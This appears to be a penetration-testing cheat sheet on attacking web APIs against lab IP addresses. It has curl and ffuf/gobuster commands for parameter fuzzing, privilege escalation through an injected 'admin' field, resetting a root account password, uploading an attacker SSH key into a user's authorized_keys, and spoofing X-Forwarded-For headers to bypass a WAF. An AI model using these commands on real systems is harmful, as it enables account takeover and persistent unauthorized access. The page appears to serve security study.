APIs

Fuzzing APIs

/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://192.168.205.249:33414/login/v1?FUZZ=1 
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://192.168.205.249:33414/?FUZZ=1

Burp could also be used with Intruder + Sniper

Rest APIs

APIs usually follow the format of /api_name/v1 , we can enumerate using a gobuster pattern 

gobuster dir -w directories.txt -p apis_patt.txt -u http://192.168.205.249:33414/ -t100

Inspecting the API

curl -i http://192.168.205.249:33414/help 
curl http://192.168.205.249:33414/help | python -m json.tool

You should dir bust all api paths you find

Posting to an API

curl -d '{"user":"admin", "password":"test"}' -H 'Content-Type:application/json' http://192.168.205.249:33414/login/v1

curl -d '{"user":"admin", "password":"test", "admin":"True"}' -H 'Content-Type:application/json' http://192.168.205.249:33414/register/v1

Example: Changing root account password

curl 'http://192.168.50.16:33414/user/v1/root/password' -H 'Content-Type: application/json' -H 'Authorization: OAuth eyJ0eXAiOiJKV1Q -d '{"password": "adot8"}'

curl -X 'PUT' 'http://192.168.50.16:33414/users/v1/root/password' -H 'Content-Type: application/json' -H 'Authorization: OAuth eyJ0eXAiOiJKV1Q' -d '{"password": "adot8"}'

Uploading Files

curl http://192.168.205.249:33414/file-upload -i -L -X POST -H "Content-type: multipart/form-data" -F file="@$(pwd)/authorized_keys.txt" -F filename='/home/alfredo/.ssh/authorized_keys'

WAF Bypass

Add the X-Forwarded-For: 127.0.0.1 header to the request.

curl http://192.168.214.134:13337/logs -H 'X-Forwarded-For: 127.0.0.1'
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
PreviousXXSNextPHP Applications

Last updated